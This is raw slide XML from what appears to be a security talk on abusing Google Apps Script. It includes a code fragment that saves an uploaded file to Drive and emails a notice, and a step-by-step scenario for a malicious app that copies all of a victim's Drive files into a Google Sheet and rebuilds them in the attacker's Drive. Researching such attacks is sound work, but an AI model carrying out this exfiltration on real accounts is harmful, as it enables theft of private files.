              <a:rPr lang="fr-FR" sz="800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>obj.mimeType</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>obj.fileName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>var file = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>folder.createFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>(blob);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>file.setDescription</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>("Document envoyé par " + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>obj.monNom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MailApp.sendEmail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>("XXX@gmail.com",</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>"Document envoyé ",</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>obj.monNom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t> + " (" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>obj.monEmail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t> + ") a envoyé le document " + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>file.getUrl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>());</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>return "Fichier envoyé";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>} catch (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>error.toString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 70">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B13CF04E-AEA4-2518-6FE5-DD29FCC1CDD4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="15346"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1254443" y="1071742"/>
            <a:ext cx="3210402" cy="1915246"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent3"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 73">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{738E306C-C631-951F-5A1E-8C6B8EB9B29E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect r="28382"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2935780" y="3168034"/>
            <a:ext cx="2672365" cy="1546737"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent3"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 72">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7EC95E95-20A8-8134-CD08-50502385808D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect r="13369"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="154306" y="3168035"/>
            <a:ext cx="2560319" cy="1546737"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent3"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="ZoneTexte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C77468B0-340F-FFC3-F28D-559B7AAD2FC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8641080" y="4897279"/>
            <a:ext cx="502061" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0"/>
              <a:t>27/47</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4104146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Scenario #1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 70">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B13CF04E-AEA4-2518-6FE5-DD29FCC1CDD4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="15346"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1254443" y="1071742"/>
            <a:ext cx="3210402" cy="1915246"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent3"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 73">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{738E306C-C631-951F-5A1E-8C6B8EB9B29E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect r="28382"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2935780" y="3168034"/>
            <a:ext cx="2672365" cy="1546737"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent3"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 72">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7EC95E95-20A8-8134-CD08-50502385808D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect r="13369"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="154306" y="3168035"/>
            <a:ext cx="2560319" cy="1546737"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent3"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="ZoneTexte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C77468B0-340F-FFC3-F28D-559B7AAD2FC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8641080" y="4897279"/>
            <a:ext cx="502061" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0"/>
              <a:t>27/47</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle : coins arrondis 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99B567E3-066D-7A6A-D8AA-69BA02077B41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6702950" y="896813"/>
            <a:ext cx="2051436" cy="310101"/>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t>DriveApp.getFoldersByName</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Flèche : bas 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9A22C12-2AFF-4E95-BDAD-9F7624DACB85}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7673940" y="1306062"/>
            <a:ext cx="135173" cy="272832"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="9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E3699BA5-59F4-8546-356F-4F1E9940F287}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6702950" y="1676582"/>
            <a:ext cx="2051436" cy="310101"/>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t>DriveApp.createFolder</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle : coins arrondis 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D20427E-CD8A-7841-3348-F66942C88B2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6702950" y="2471926"/>
            <a:ext cx="2051436" cy="310101"/>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t>Utilities.newBlob</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rectangle : coins arrondis 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B926B23-75A3-027B-63CA-9E10AA488E1B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6702950" y="3283826"/>
            <a:ext cx="2051436" cy="310101"/>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t>folder.createFile</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rectangle : coins arrondis 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2032ABD8-34AA-C75C-D90A-D961B68AB161}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6715808" y="4069712"/>
            <a:ext cx="2051436" cy="310101"/>
          </a:xfrm>
          <a:prstGeom prst="round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t>MailApp.sendEmail</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Flèche : bas 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7A403B7-E40A-15B7-2485-4FFF67561C04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7673940" y="2096968"/>
            <a:ext cx="135173" cy="272832"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="9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 bas 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59F3FD57-F49C-0F18-4F50-5CA2F3DD9B84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7673940" y="2895202"/>
            <a:ext cx="135173" cy="272832"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="9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lèche : bas 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B890820-967A-AF60-FF95-0F50E986C9B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7673940" y="3691428"/>
            <a:ext cx="135173" cy="272832"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="9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87402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Scenario #2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Sous-titre 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC270F5D-E53C-182B-1F0B-8E9773948A95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311711" y="1272521"/>
            <a:ext cx="7925384" cy="1174261"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" lvl="1" indent="-285750" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>The victim accesses a malicious GAS application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="1" indent="-285750" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>The executed script lists all files in the victim's Google Drive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="1" indent="-285750" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>These files are then transformed into blobs and into byte array then compressed and encoded in base64</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="1" indent="-285750" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>The base64-encoded string is divided into 50 000 characters chunks (limit for one cell on Google Sheet) and written into the cells of the column dedicated to the current file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="1" indent="-285750" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>A second application rebuild the data exfiltrated in base64 and write the files to the Google Drive space of the attacker</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="ZoneTexte 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41016FD7-1260-E4FD-ACD4-E77486B7EB20}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8641080" y="4897279"/>
            <a:ext cx="502061" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0"/>
              <a:t>28/47</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3859318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Scenario #2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Image 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A3B322B-7717-2ECD-873E-D1B5047111C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="478827" y="1035571"/>
            <a:ext cx="4931766" cy="1074598"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent3"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="ZoneTexte 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3D526D2-3DB7-6BDA-A175-954E41CAA2A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1939536" y="1204848"/>
            <a:ext cx="2264146" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Transfer all documents</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 2" descr="Hacker - Free people icons">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA0A77A6-0F8A-D8AB-1EE2-AEEFCB23E090}"/>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67918" y="1069937"/>
            <a:ext cx="450170" cy="4501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 coins arrondis 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F16B8B8-3C70-F58D-A0C4-857B3CD573DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5829300" y="959412"/>
            <a:ext cx="3210401" cy="3923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1400" b="1" dirty="0"/>
              <a:t>Code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>snippet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>const</a:t>
